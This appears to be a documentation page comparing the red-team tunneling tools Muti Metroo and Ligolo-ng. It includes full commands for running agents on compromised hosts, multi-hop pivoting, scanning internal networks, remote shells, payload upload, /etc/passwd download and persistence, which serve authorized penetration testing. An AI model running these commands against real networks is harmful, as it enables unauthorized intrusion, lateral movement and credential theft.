Skip to main content

Muti Metroo vs Ligolo-ng

This guide provides a detailed comparison between Muti Metroo and Ligolo-ng, a popular tunneling tool used in penetration testing and red team operations. Both tools enable secure access to internal networks through compromised hosts, but they take fundamentally different approaches.

Overview

AspectMuti MetrooLigolo-ng
ArchitecturePeer-to-peer mesh networkClient-server (proxy + agents)
Connection ModelAgents connect to each otherAgents connect to central proxy
Traffic HandlingSOCKS5 proxy (+ optional TUN via Mutiauk)TUN interface on proxy
Multi-hopNative multi-hop routingManual chaining required
E2E EncryptionYes (X25519 + ChaCha20-Poly1305)TLS transport only
Protocol SupportTCP, UDP (via SOCKS5 UDP ASSOCIATE)TCP, UDP, ICMP echo
Transport OptionsQUIC, HTTP/2, WebSocketTCP/TLS only
Root RequiredNo (Mutiauk requires root if used)Yes (on proxy for TUN)
C2 FeaturesShell, file transfer, web dashboardBasic tunnel management

Architecture Comparison

Ligolo-ng: Centralized Proxy Model

Ligolo-ng uses a centralized architecture where all agents connect back to a single proxy server:

The proxy creates a TUN interface and routes traffic to agents. This is simple and effective for basic pivoting scenarios.

Strengths:

  • Simple setup and operation
  • Direct TUN interface means no SOCKS configuration needed
  • All traffic (TCP, UDP, ICMP) flows naturally through the interface

Limitations:

  • Single point of failure at the proxy
  • All agents must reach the proxy directly (or through a listener chain)
  • No end-to-end encryption between proxy and final destination

Double pivoting: When an agent cannot reach the proxy directly, Ligolo-ng supports chaining via listeners. You create a listener on an existing agent using listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601, then connect the new agent through that listener. Each hop requires manual listener setup, a new TUN interface, and route configuration.

Muti Metroo: Decentralized Mesh Model

Muti Metroo creates a peer-to-peer mesh where agents connect to each other:

Traffic flows through the mesh following advertised routes. Any agent can serve as ingress, transit, or exit.

Strengths:

  • No single point of failure
  • Native multi-hop routing with automatic path discovery
  • True end-to-end encryption (transit nodes cannot decrypt)
  • Multiple transport protocols for different environments
  • Rich C2 features (shell, file transfer, dashboard)

Limitations:

  • More complex initial setup
  • Requires SOCKS5-aware applications (or Mutiauk for transparent routing)
  • Certificate management for TLS/mTLS

Feature Comparison

Traffic Handling

FeatureMuti MetrooLigolo-ng
TCP tunnelingYes (SOCKS5 CONNECT)Yes (native TUN)
UDP tunnelingYes (SOCKS5 UDP ASSOCIATE)Yes (native TUN)
ICMP supportNoYes (echo only)
Application configSOCKS5 proxy settingsNone (transparent TUN)
Transparent modeVia Mutiauk (Linux only)Native

Ligolo-ng uses a TUN interface which provides transparent traffic routing - applications need no configuration. However, this requires root privileges on the proxy.

Muti Metroo uses SOCKS5 proxy which requires application configuration but needs no root privileges. For transparent routing, the companion tool Mutiauk provides a TUN interface on Linux (requires root).

Transport Security

FeatureMuti MetrooLigolo-ng
Transport encryptionTLS 1.3 (QUIC/H2/WS)TLS
Certificate optionsCA-signed, self-signed, Let's EncryptSelf-signed, Let's Encrypt
mTLS supportYesNo
End-to-end encryptionYes (X25519 + ChaCha20-Poly1305)No

Critical difference: Muti Metroo provides true end-to-end encryption where transit nodes cannot decrypt stream payloads. In Ligolo-ng, the proxy can see all traffic in plaintext.

Multi-hop Capabilities

ScenarioMuti MetrooLigolo-ng
Single pivotNativeNative
Double pivotNative (automatic routing)Manual (create listeners, manage sessions)
N-hop chainsNative (up to 16 hops by default)Complex (each hop requires listener setup)
Path redundancyAutomatic failoverManual reconfiguration

Muti Metroo handles multi-hop scenarios automatically through flood-based route propagation. Routes are discovered and traffic flows through the optimal path.

Ligolo-ng requires manual setup for each additional hop:

  1. Create listener on intermediate agent (listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601)
  2. Connect new agent through the listener
  3. Create additional TUN interface for new session
  4. Add routes for the new network segment

Transport Protocol Options

TransportMuti MetrooLigolo-ng
QUIC/UDPYesNo
HTTP/2YesNo
WebSocketYes (with HTTP proxy support)No
TCP/TLSYesYes

Muti Metroo offers multiple transports for different network environments:

  • QUIC: Best performance, requires UDP
  • HTTP/2: Firewall-friendly, standard HTTPS
  • WebSocket: Maximum compatibility, works through corporate proxies

C2 Capabilities

FeatureMuti MetrooLigolo-ng
Remote shellYes (interactive PTY + streaming)No
File transferYes (streaming with compression)No (manual via listeners)
Web dashboardYes (topology visualization)Yes (v0.8+)
Remote agent managementYes (via mesh)Yes (basic)
PersistenceYes (systemd, launchd, Windows Service)No

Privilege Requirements

ComponentMuti MetrooLigolo-ng
AgentNo rootNo root
Proxy/IngressNo rootRoot (for TUN)
Mutiauk (TUN tool)Root (Linux only)N/A

Usage Comparison

Basic Pivoting

Ligolo-ng:

# On attacker (Kali)
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert

# On target
./agent.exe -connect attacker:11601 -ignore-cert

# On attacker - select session and start tunnel
ligolo-ng >> session
ligolo-ng >> start

# Add route
sudo ip route add 192.168.1.0/24 dev ligolo

# Access internal network
nmap -sT -Pn 192.168.1.0/24

Muti Metroo:

# On attacker - initialize and run ingress agent
muti-metroo init -d ./data
muti-metroo setup  # Interactive wizard configures SOCKS5, peers, TLS
muti-metroo run -c config.yaml

# On target - run exit agent with routes
muti-metroo run -c exit-config.yaml
# exit-config.yaml specifies: exit.routes: ["192.168.1.0/24"]

# Access internal network via SOCKS5
curl -x socks5h://127.0.0.1:1080 http://192.168.1.10

# Or configure browser/application to use SOCKS5 proxy

Double Pivoting

Ligolo-ng (manual listener setup):

# 1. Create second TUN interface on attacker machine
sudo ip tuntap add user kali mode tun ligolo-double
sudo ip link set ligolo-double up

# 2. In Ligolo proxy, select Agent 1 session and create listener
ligolo-ng >> session
# Select Agent 1
ligolo-ng >> listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
ligolo-ng >> listener_list  # Verify listener is active

# 3. On second target (no direct internet), connect through Agent 1
./agent.exe -connect 192.168.56.128:11601 -ignore-cert
# (use Agent 1's internal IP and the listener port)

# 4. Back in Ligolo proxy, switch to Agent 2 session and start tunnel
ligolo-ng >> session
# Select Agent 2
ligolo-ng >> tunnel_start --tun ligolo-double

# 5. Add route for second network on attacker machine
sudo ip route add 10.0.0.0/8 dev ligolo-double

Each additional hop requires repeating steps 1-5: create new TUN, add listener on current pivot, connect new agent through listener, start tunnel, add route.

Muti Metroo (automatic):

# Agent A (ingress) - already running with SOCKS5

# Agent B (transit) - connects to A
# config.yaml peers: [{ id: "agent-a-id", address: "..." }]
muti-metroo run -c transit-config.yaml

# Agent C (exit) - connects to B, advertises routes
# config.yaml:
#   peers: [{ id: "agent-b-id", address: "..." }]
#   exit:
#     routes: ["10.0.0.0/8"]
muti-metroo run -c exit-config.yaml

# Routes propagate automatically: A learns 10.0.0.0/8 via B via C
# Access immediately via SOCKS5 on Agent A
curl -x socks5h://127.0.0.1:1080 http://10.0.0.50

Remote Command Execution

Ligolo-ng: Not supported natively. Requires separate C2 framework or manual shell access.

Muti Metroo:

# Execute command on remote agent
muti-metroo shell abc123def456 whoami

# Interactive shell (PTY)
muti-metroo shell --tty abc123def456 bash

# File transfer
muti-metroo upload abc123def456 ./payload.exe /tmp/payload.exe
muti-metroo download abc123def456 /etc/passwd ./passwd

Transparent Traffic (TUN Interface)

Ligolo-ng: Built-in on proxy side.

Muti Metroo with Mutiauk:

# Install Mutiauk (Linux only)
curl -L -o mutiauk https://github.com/postalsys/Mutiauk/releases/latest/download/mutiauk-linux-amd64
chmod +x mutiauk && sudo mv mutiauk /usr/local/bin/

# Configure (interactive wizard)
sudo mutiauk setup

# Or manual config
sudo tee /etc/mutiauk/config.yaml << 'EOF'
tun:
  name: tun0
  address: 10.200.200.1/24
socks5:
  server: 127.0.0.1:1080
routes:
  - destination: 192.168.1.0/24
    enabled: true
EOF

# Start Mutiauk daemon
sudo mutiauk daemon start

# Now all traffic to 192.168.1.0/24 routes through Muti Metroo
nmap -sT -Pn 192.168.1.0/24

Migration Guide for Ligolo Users

If you are currently using Ligolo-ng and want to try Muti Metroo, here is how to translate common workflows:

Conceptual Mapping

Ligolo-ng ConceptMuti Metroo Equivalent
Proxy serverIngress agent with SOCKS5
AgentAgent (can be ingress, transit, or exit)
TUN interfaceMutiauk (optional) or SOCKS5 proxy
SessionPeer connection
ListenerExit route advertisement
start commandAutomatic (routes propagate)

Configuration Translation

Ligolo-ng proxy setup:

./proxy -selfcert -laddr 0.0.0.0:11601

Muti Metroo ingress agent:

# config.yaml
agent:
  data_dir: ./data

listeners:
  - transport: quic
    address: "0.0.0.0:4433"

socks5:
  enabled: true
  address: "127.0.0.1:1080"

tls:
  cert: ./certs/agent.crt
  key: ./certs/agent.key
  ca: ./certs/ca.crt

Ligolo-ng agent connection:

./agent -connect proxy:11601 -ignore-cert

Muti Metroo exit agent:

# exit-config.yaml
agent:
  data_dir: ./data

peers:
  - id: "ingress-agent-id"
    transport: quic
    address: "proxy:4433"

exit:
  enabled: true
  routes:
    - "192.168.1.0/24"
    - "10.0.0.0/8"

tls:
  cert: ./certs/agent.crt
  key: ./certs/agent.key
  ca: ./certs/ca.crt

Key Workflow Differences

  1. Route Management: In Ligolo-ng, you manually add routes with ip route add. In Muti Metroo, exit agents advertise routes and they propagate automatically.

  2. Session Selection: Ligolo-ng requires selecting sessions and starting tunnels. Muti Metroo handles this automatically through its routing system.

  3. Multi-hop: Ligolo-ng needs manual listener setup for each hop. Muti Metroo routes through multiple hops automatically.

  4. Traffic Access: Ligolo-ng uses a TUN interface directly. Muti Metroo uses SOCKS5 (add Mutiauk for TUN-like behavior).

When to Use Which Tool

Choose Ligolo-ng When:

  • You need the simplest possible setup for basic pivoting
  • Your scenario is single-hop only
  • You need native ICMP support (ping)
  • You want transparent routing without SOCKS5 configuration
  • You prefer TUN-based traffic handling over proxy configuration
  • You are already familiar with the tool and have established workflows

Choose Muti Metroo When:

  • You need multi-hop routing through multiple network segments
  • Transit node security matters (E2E encryption)
  • You need multiple transport options (HTTP/2, WebSocket for restrictive networks)
  • You want integrated C2 features (shell, file transfer)
  • You need a resilient mesh with no single point of failure
  • You require mTLS mutual authentication
  • Your operation requires stealth (configurable protocol identifiers)
  • You need persistence and service installation

Use Both Together:

For comprehensive coverage, you can use both tools:

  • Ligolo-ng for quick, simple pivots during initial access
  • Muti Metroo for persistent, multi-hop infrastructure during longer operations

Performance Comparison

MetricMuti MetrooLigolo-ng
ThroughputHigh (QUIC optimized)100+ Mbps
Latency per hop1-5ms (LAN), 50-200ms (WAN)Low (single hop typical)
Memory per stream256KB buffer per hopMinimal
Connection setup1-RTT (QUIC), 2-RTT (others)Standard TLS

Both tools offer excellent performance for typical penetration testing scenarios. Ligolo-ng may have slightly less overhead for single-hop scenarios, while Muti Metroo's QUIC transport provides better performance for high-latency or lossy connections.

Summary

Both Muti Metroo and Ligolo-ng are capable tunneling tools, but they serve different use cases:

Ligolo-ng excels at simplicity - it is easy to set up, provides transparent TUN-based routing, and handles basic pivoting scenarios efficiently. It is an excellent choice for quick engagements where you need to pivot through a single compromised host.

Muti Metroo provides a more sophisticated mesh networking approach with true end-to-end encryption, automatic multi-hop routing, multiple transport options, and integrated C2 capabilities. It is better suited for complex operations requiring resilience, stealth, and advanced features.

The choice ultimately depends on your operational requirements, the complexity of the target environment, and whether you need the additional security and features that Muti Metroo provides.